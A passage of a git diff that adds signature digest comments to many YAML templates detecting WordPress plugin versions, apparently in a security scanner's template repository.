4a0a004730450220770ed1df62c323d7e06666b11299dde936d37d61651fb0b3f80db5d553933930022100ba1abeddc74d0563de5d4d388b2a36fdf9a380b659cf7a6aa9a6a8ef96c76c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..2ac356a631 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8c39ee0dbafe5dcd7f53b5234e702ffab9fb48c412aaf04f219b3e90ab79f92022100b9042d1017b3bfa511f1ad4cb2fec14c568409f9697bf32826dc74842a8d45de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..06dcf6d84d 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b5082cf06964e01d5c2dfb31e7a99923cad1ebae851ec35dc9c387f5cebec41022100b5efc8c5c124bf2b326beae08076fcacb665a94191813cbb3dd3e04fd72670b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..109958a7b7 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207de3129b063aedf60e94221ebe84dde532e9f22a468a2e593a8d9afb61d3b80c022100aa6da8dfc95e82b64c59f46ec1fa08e0175831278258276596320fcc1b69a456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..6a71d1da3f 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205fbcf98560d324060ccb8bd6a6a5c9bf8a034ab9e1517278df57bf598c08d1bb022100892b8666d0a26cf9a61b38fbe1efb524c3df51078e41b9d4d671b0db9a10b031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..5aecb2bd46 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f55f5262c3f309e53b3f36cd3a85447516f6e9e56093462794dfb77ca782d3d022020e1070b8aa445d48acda714f5d4e7b594146b2ae76d7a0b804c5ab0b82cf86a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..f9a3602e78 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4341e1009d6a9d9b9eed702abee0b909824b732dccf6856d441983d28ff7b26022100f52f15636957221eade5ca919f5d03672b3546a73dafc782ff0e16680dc6803d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..02454c2b14 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f45ed1d92acb13167da4a1d5683306639bfede76f33a5a6e5aa74c73c40d58460221008d41a53d410bf20d1774e954b29facb5e119d59fe099471c07d8d6e42e82db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..7a43a1648b 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048ef5d1540b2ffee8e5b650cca5a7e740888eeed1e25296380b2a17052d97f9b022100bbee40fdc61a8d2ddffc3a5df51a029e0902cdb16652fbf0963e2f60c4211169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..2a574e6646 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220657cf10f90daf78233151c415228a668a2b0dae0c637d019ce2c88ff7e7221ef02202a09f2ce4695a2d18dd8d2b95315dd4fb6776ff53765120b4ecc9ec6cbf3ce41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..3241cfadfa 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073146792c9313797508b74baf87230fee7cac57e7c0d600ff56852a682727317022100dc735b00a72e86a132f36ab446ecd78f89c178cdf7c955b74c31d27e5231ace2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..a01c624347 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204de2c42b39ac43725151ad901f1f1b2a704d85b531d4f5ae91dc17c2abd043df022077f2a4938af3f86f39b03b22a7a73d786cb9d8b3453308e0bf5b84fa18dd2e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..c407df0050 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e43bd782a0019bfa3fef6af2276155fca7b242f8a45b34de036c2fccd69cccd102206960bd330c84add83104caf2db5845e8611e1c2bbbf7292dd9320f1d0b9e3e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..463480b8f4 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ca13ae1b925366b89a0df7149a31643b3a97a525ec39f2e19307562c62c153502200d52b375c29ca2f79f1c6febdf6a3ba7bd8cb9a10db8f0f9b3bff8d49dbfac02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..fde974742c 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220360e72e0c26c2f6a663b72a57c2d3826ba4fa9f15215dec0c99a13f1a4b7d6ad0220230612c93a79b6844b81ec52ab7eb78aeffc753977e6b186d47448445aa7fe68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..24caf5c9aa 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0b9023fe3248e33a25ecf7048cae556cd84cc89a8a321f3efc945437e9371fc022100e46dee0a454456df343dee54a886744b5c99b38e67aac32687d1e3f969381a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..860ac14aa2 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d20c755f3a0fc3487994512082d7db209b9d3853202af4d52fa666648be18348022100bab882c8d319a605959c8e90030b5bcf2b368e0672e0bd6a950ee6736c55c157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..87dc2528a6 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028380effe3742a8f29031cbb20e60f0367e454ee03831e5427f556412291988602204d02a8327d0aec9838fa7bce1e7077d4c46d4df5bb6e1c22a549caae2aeece4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..a431a46e0d 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d29daabb6a7d4ee004ac0d4ef5a597ba7cb64c26cd66cc707daf851736d45c502210099644ad44088178fc850963a344e01d7b9eca0ecfe7a3e32b86c1a32032d74b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..4f7e445d86 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024e302f8956a0918d301d86eadbd5ced02b7ca756f56c16d5e1b860545aa14ee02206529da1bb9cb5fa767b8cb4b16e69556091e5e89616e462faab104fee5fb9ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..e8981ffbdf 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c81c532a17a031019056b53f4f6ae9707d0292f7b053a4a790739309fcf07877022100b488dc13052fb46edc50b4bfe867233010a7f8637d35cdc6f56011ac028c15d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..4bb5cd9854 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b38a0cd5e483c0dc9f77953e26e8f7377d2752ab0469e9499ed36e3f0726a0e202200bb47696c982c314731e411ceca4f764bc9dde1545160ef275278f37242ce226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..54698abd8d 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd9951c04796b7086708c3fb09fedd3355a1eca1e12847f71ca847a122c6a1f10220630495641b0f8a5b7261a36eeb477ea3e6289b609a640b9ad4c25ca495a8a73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..736cc64363 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220357d06ef9dfc077a939d47219a8651ecdfeb3191892461cc91c9dee5638fe0cc02210098d74263a2bd6c7c1f8c92ccccf79e2e1d89064b153ad72a61663860c9c52ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..a782407353 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022027c35c173b66e1858069c7b0477f20f440245411402cdc865bf2902ac5814466022100cea5322eb35a164a49f7096acde323cb73bee143afa39d7474378bd6eff20ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..74c272c9ca 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f06fe2c5b04cee45989ba95c6e1cd0a6b93b845fc6a3a0da69945fdda68e56d02204973c0279612c575b51e47c62181354ed4e8a83d69c144ebf78b1eb61cc68381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..faba721301 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200fa0820ed7254515bd27d05593817072158a36399e1c40b049d2b16eb30b40e6022100978b3a45e6683b2dfd7d96b6922675f19f8894c3929c8f42164758a28962a08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..77c3a39a51 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a4962e5223a8af803879918ac5cb2931247d3fbcf99b158f52fad3e4e8ebb4f02210095f1fcfafc7df22206ef8ac864b77ea31e2c928f959f8c6d056f7f5f0c5cdf2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..fdac9815e1 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022018124e7961eff98b0f18e358b178accaa75a924e2b16704cb0f028e4b384471c022100a8ea275117d9c0bc54449579ae7dcfd317f1ab537cfe76ad5d338a741dffee04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..cd091d879e 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090912c48245c8a21f423367c9f6a2ac037fef9fd30454bf9ccfe67cb9973b1d0022100ceb2c4b0bc69ea41a93856f58e590e071fd21eae6b7a5d6c792445344e902592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..77f238212b 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100970a35952f0858b966a5a1875ca748a97dafaa513a0a4dc1068e9dd9107c6dfd02202d4bd2e90a235ef8c7aff23ec888c819e4d1d3ade0a0f43912cc07d83542560c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..5eee026146 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d709883e1ac1d0c5a488938e9515432bfd8a5e5f6f66df9f51ec73c5edc6f860022100a1a256bb32363f93cfab2094e324ed959f7f05369f83419906200477c569b466:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..3abef53e0f 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056cd0ebd74f21ffad60a04c7cbc4f12f0ae3b45aae1c13166584297b4eb854d9022100b30cd9e0027af039eb5deecbc3fffb96053e62c0819ccb34441cd55a51077b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..7f7e270b6b 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdbe95249ffdba58c751370d28daa20982670b141a9bd6cb4f13719e2659e62d022100d81159192da5dcab10b8e7af15d4fd4ebc0efb7a583c68ab440282b164b12d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..59c2e19a33 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203881cb61210cb7e7faf3f5c272919f2d64b263ee22cff444d48b95497052f406022100b1efd6da45f59919fb1eec000ff7c017695be5e71a3377a83e7893d53c2521ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..dab1cf15b5 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cfce7b6e508fca730865975eee474b03611e48f47145e3a668b0d0cd0d3bc336022100d49f23b9c8e551386021e98c753fe7c5ba82efd784a2109f1596e969826c2fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..6f57e6426a 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075fca46e4060d4ad75acba4c78e5a6465005a0fed5ab4d7b0933fecb6a26571e022100b14a051fdd3c1432fedd9a902e892ee4b52e42d9b1b1a8ec5d11aa552a387d2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..46c3e5959e 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee9853dcb5b99d7b7bc794583cdd032645d6f9c2c45b9125529bae65b3121aaf022100c3e5ebff5e915697c899fe4efc7bd6a4b3924b5711aeebe39676e958f299a6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..19fcf7a180 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073f2c4e4508ff9ee349c8ab4f214adc4b51f1e94650c683f19dbaaf6c43173bc022100a607a1734e17dc15af2790214d8955e93e3e008381fce7ca7447ba820e6e5f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..78f4780c6c 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d328825b1e21531fc9db8493cfbb9038cd1f46823fdcfc13af221da7213930002207d2f2e4eb905377251396074c4c67570356f1bd96c0b450122a94fecfc2d947b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..b10b546d28 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0c6b594e4bb725476272e67ed054f73bb1d4d7b4a63017b7c964a46dddc0edb02204719ed4cf84b390d1c42c4a16e177b4414b8b332f3ad1337e3d9146397f8a755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..ad8fb1a50f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c2862688856981fa08f8c41c7265baeeb4e253de2b516879c83f0bebf6a07810220578020bd91d1513a5d8cfc85bd4984478705efe59f97b74b414bdb47e7dd9075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..ccc704a3b6 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038fbb94caeb32da17479af25de7be0680876f6e413b75087262a13179d8f81a502206b998a9a7717e0a436d853244172e4ec1d4b1518546f275cb9d624772704fb8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..4822ad6e3f 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206971970b6d1842a0f7029e131b3e21df255ec2ca0eac471bbf941f4337fd1618022100d648ce8a20d423289da3e37410f7ba6abfef014e7df41559e40bb9bd76d34477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..eb0260cc0f 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b33d2273e60796a85266574f2f4345635f51d623125b25c46d1debee9badd299022100a95a673c957b79c01c73316963f19ff65cb3b725782b5f8f86a8c4966dd88ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..4709617427 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022020347417c55e6e336e9adc0b2203d3d676f121aeee716bd7644ad050b8d1c65402204ebf5edc639ee0f589bf10e53c34da93d5743bb8e5c17fe5f077482e389a9390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..3b9d4b8fc7 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022020738c96ddb89dccb6b58f4a81ae243a7dce5c2208ac580452575c111945bb1102206c19c2a416d404e72a4229da0f0a57a6da77bc425035468223a09beb8314f6d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..cbd4fe14d7 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd0203e37df7d659ece1560eefece22e09187abace8270e03352dce2ac733c710221008e38e6321395d8d9ee4e2e7e1869bd8247f7d1e94fc442fd0c6055a42f5d7241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 